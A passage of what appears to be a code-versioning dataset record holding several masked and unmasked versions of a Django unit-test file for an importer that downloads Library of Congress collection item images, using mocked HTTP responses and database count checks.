mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n\nclass DownloadWriteItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n",
"step-3": "<mask token>\n\n\nclass GetItemIdFromItemURLTest(TestCase):\n\n def test_get_item_id_from_item_url_with_slash(self):\n \"\"\"\n Testing get item id from item url if ends with /\n \"\"\"\n url = 'https://www.loc.gov/item/mss859430021/'\n resp = get_item_id_from_item_url(url)\n self.assertEqual(resp, 'mss859430021')\n\n def test_get_item_id_from_item_url_without_slash(self):\n \"\"\"\n Testing get item id from item url if ends without /\n \"\"\"\n url = 'https://www.loc.gov/item/mss859430021'\n resp = get_item_id_from_item_url(url)\n self.assertEqual(resp, 'mss859430021')\n\n\nclass GETRequestDataTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n :return:\n \"\"\"\n self.url = 'https://www.loc.gov/item/mss859430021?fo=json'\n\n @patch('importer.tasks.requests.get')\n def test_get_request_success_json_data(self, mock_get):\n \"\"\"get data on success json data\"\"\"\n mock_resp_instance = MockResponse({'msg': 'success'}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance.json())\n\n @patch('importer.tasks.requests.get')\n def test_get_request_not_success(self, mock_get):\n \"\"\"get data on not success\"\"\"\n mock_resp_instance = MockResponse({'msg': 'bad request'}, 400)\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url)\n self.assertEqual(mock_resp_instance.status_code, 400)\n self.assertEqual(response, {})\n\n @patch('importer.tasks.requests.get')\n def test_get_request_normal_response(self, mock_get):\n \"\"\"if json false return repose object with content\"\"\"\n mock_resp_instance = MockResponse({'msg': 'success'}, 200, content=\n 'abc')\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url, json_resp=False)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance)\n\n\nclass GetCollectionPagesTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with pages info\n \"\"\"\n mock_resp_instance = MockResponse({'pagination': {'total': 10}}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_collection_pages(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 10)\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_sucess_no_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with no pages info\n \"\"\"\n mock_resp_instance = MockResponse({}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_collection_pages(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 0)\n\n\nclass GetCollectionItemidsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_item_ids(self, mock_get):\n \"\"\"\n Testing no of collection item 
ids available in given collection url\n \"\"\"\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n response = get_collection_item_ids(self.url, 2)\n self.assertListEqual(response, ['mss37820001'])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_item_ids_no_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids not availabel collection url\n \"\"\"\n mock_page1_result = MockResponse({}, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n response = get_collection_item_ids(self.url, 2)\n self.assertListEqual(response, [])\n\n\nclass GetCollectionItemAssetURLsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [\n 'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'\n ])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_no_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls not available in given item id\n \"\"\"\n mock_resp = MockResponse({}, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [])\n\n\nclass DownloadWriteCollcetionItemAssetTest(TestCase):\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item(self, mock_get):\n \"\"\"\n Testing download image and write into disk without error\n \"\"\"\n mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, True)\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item_error(self, mock_get):\n \"\"\"\n Testing download image with exception\n \"\"\"\n mock_resp = MockResponse({}, 200, content=Exception('boom'))\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, False)\n\n\nclass DownloadWriteCollectionItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 
'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes_no_db_entry(self,\n mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n\nclass DownloadWriteItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def 
test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n",
"step-4": "<mask token>\n\n\nclass MockResponse:\n <mask token>\n <mask token>\n <mask token>\n\n def iter_content(self, chunk_size=None):\n return io.BytesIO(self.content.encode())\n\n\nclass GetItemIdFromItemURLTest(TestCase):\n\n def test_get_item_id_from_item_url_with_slash(self):\n \"\"\"\n Testing get item id from item url if ends with /\n \"\"\"\n url = 'https://www.loc.gov/item/mss859430021/'\n resp = get_item_id_from_item_url(url)\n self.assertEqual(resp, 'mss859430021')\n\n def test_get_item_id_from_item_url_without_slash(self):\n \"\"\"\n Testing get item id from item url if ends without /\n \"\"\"\n url = 'https://www.loc.gov/item/mss859430021'\n resp = get_item_id_from_item_url(url)\n self.assertEqual(resp, 'mss859430021')\n\n\nclass GETRequestDataTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n :return:\n \"\"\"\n self.url = 'https://www.loc.gov/item/mss859430021?fo=json'\n\n @patch('importer.tasks.requests.get')\n def test_get_request_success_json_data(self, mock_get):\n \"\"\"get data on success json data\"\"\"\n mock_resp_instance = MockResponse({'msg': 'success'}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance.json())\n\n @patch('importer.tasks.requests.get')\n def test_get_request_not_success(self, mock_get):\n \"\"\"get data on not success\"\"\"\n mock_resp_instance = MockResponse({'msg': 'bad request'}, 400)\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url)\n self.assertEqual(mock_resp_instance.status_code, 400)\n self.assertEqual(response, {})\n\n @patch('importer.tasks.requests.get')\n def test_get_request_normal_response(self, mock_get):\n \"\"\"if json false return repose object with content\"\"\"\n mock_resp_instance = MockResponse({'msg': 'success'}, 200, content=\n 'abc')\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url, json_resp=False)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance)\n\n\nclass GetCollectionPagesTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with pages info\n \"\"\"\n mock_resp_instance = MockResponse({'pagination': {'total': 10}}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_collection_pages(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 10)\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_sucess_no_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with no pages info\n \"\"\"\n mock_resp_instance = MockResponse({}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_collection_pages(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 0)\n\n\nclass GetCollectionItemidsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = (\n 
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_item_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids available in given collection url\n \"\"\"\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n response = get_collection_item_ids(self.url, 2)\n self.assertListEqual(response, ['mss37820001'])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_item_ids_no_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids not availabel collection url\n \"\"\"\n mock_page1_result = MockResponse({}, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n response = get_collection_item_ids(self.url, 2)\n self.assertListEqual(response, [])\n\n\nclass GetCollectionItemAssetURLsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [\n 'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'\n ])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_no_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls not available in given item id\n \"\"\"\n mock_resp = MockResponse({}, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [])\n\n\nclass DownloadWriteCollcetionItemAssetTest(TestCase):\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item(self, mock_get):\n \"\"\"\n Testing download image and write into disk without error\n \"\"\"\n mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, True)\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item_error(self, mock_get):\n \"\"\"\n Testing download image with exception\n \"\"\"\n mock_resp = MockResponse({}, 200, content=Exception('boom'))\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, False)\n\n\nclass DownloadWriteCollectionItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes(self, mock_get, mock_save):\n 
\"\"\"\n Testing no of collection item asset urls available in given collection url\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes_no_db_entry(self,\n mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n\nclass DownloadWriteItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n 
self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n",
"step-5": "# TODO: Add correct copyright header\n\nimport io\nfrom unittest.mock import mock_open, patch\n\nfrom django.test import TestCase\n\nfrom importer.models import *\nfrom importer.tasks import *\nfrom importer.tests import mock_data\n\n\nclass MockResponse:\n \"\"\"\n This class will be used by the mock to replace requests.get\n \"\"\"\n\n def __init__(self, json_data, status_code, content=None, reason=\" some error\"):\n self.json_data = json_data\n self.status_code = status_code\n self.reason = reason\n self.content = content\n\n def json(self):\n return self.json_data\n\n def iter_content(self, chunk_size=None):\n return io.BytesIO(self.content.encode())\n\n\nclass GetItemIdFromItemURLTest(TestCase):\n def test_get_item_id_from_item_url_with_slash(self):\n \"\"\"\n Testing get item id from item url if ends with /\n \"\"\"\n # Arrange\n url = \"https://www.loc.gov/item/mss859430021/\"\n\n # Act\n resp = get_item_id_from_item_url(url)\n\n # Assert\n self.assertEqual(resp, \"mss859430021\")\n\n def test_get_item_id_from_item_url_without_slash(self):\n \"\"\"\n Testing get item id from item url if ends without /\n \"\"\"\n # Arrange\n url = \"https://www.loc.gov/item/mss859430021\"\n\n # Act\n resp = get_item_id_from_item_url(url)\n\n # Assert\n self.assertEqual(resp, \"mss859430021\")\n\n\nclass GETRequestDataTest(TestCase):\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n :return:\n \"\"\"\n self.url = \"https://www.loc.gov/item/mss859430021?fo=json\"\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_request_success_json_data(self, mock_get):\n \"\"\"get data on success json data\"\"\"\n\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({\"msg\": \"success\"}, 200)\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_request_data(self.url)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance.json())\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_request_not_success(self, mock_get):\n \"\"\"get data on not success\"\"\"\n\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({\"msg\": \"bad request\"}, 400)\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_request_data(self.url)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 400)\n self.assertEqual(response, {})\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_request_normal_response(self, mock_get):\n \"\"\"if json false return repose object with content\"\"\"\n\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({\"msg\": \"success\"}, 200, content=\"abc\")\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_request_data(self.url, json_resp=False)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, mock_resp_instance)\n\n\nclass GetCollectionPagesTest(TestCase):\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n 
\"\"\"\n self.url = \"https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971\"\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_collection_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with pages info\n \"\"\"\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({\"pagination\": {\"total\": 10}}, 200)\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_collection_pages(self.url)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 10)\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_collection_sucess_no_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with no pages info\n \"\"\"\n\n # Arrange\n # Construct our mock response object, giving it relevant expected behaviours\n mock_resp_instance = MockResponse({}, 200)\n mock_get.return_value = mock_resp_instance\n\n # Act\n response = get_collection_pages(self.url)\n\n # Assert that the request-response cycle completed successfully.\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 0)\n\n\nclass GetCollectionItemidsTest(TestCase):\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = \"https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971\"\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_collection_item_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids available in given collection url\n \"\"\"\n # Arrange\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n\n # Act\n response = get_collection_item_ids(self.url, 2)\n\n # Assert\n self.assertListEqual(response, [\"mss37820001\"])\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_collection_item_ids_no_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids not availabel collection url\n \"\"\"\n # Arrange\n mock_page1_result = MockResponse({}, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n\n # Act\n response = get_collection_item_ids(self.url, 2)\n\n # Arrange\n self.assertListEqual(response, [])\n\n\nclass GetCollectionItemAssetURLsTest(TestCase):\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.item_id = \"mss37820001\"\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n def test_get_collection_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n # Arrange\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n\n # Act\n response = get_collection_item_asset_urls(self.item_id)\n\n # Assert\n self.assertListEqual(\n response,\n [\n \"http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg\"\n ],\n )\n\n @patch(\"importer.tasks.requests.get\") # Mock 'requests' module 'get' method.\n 
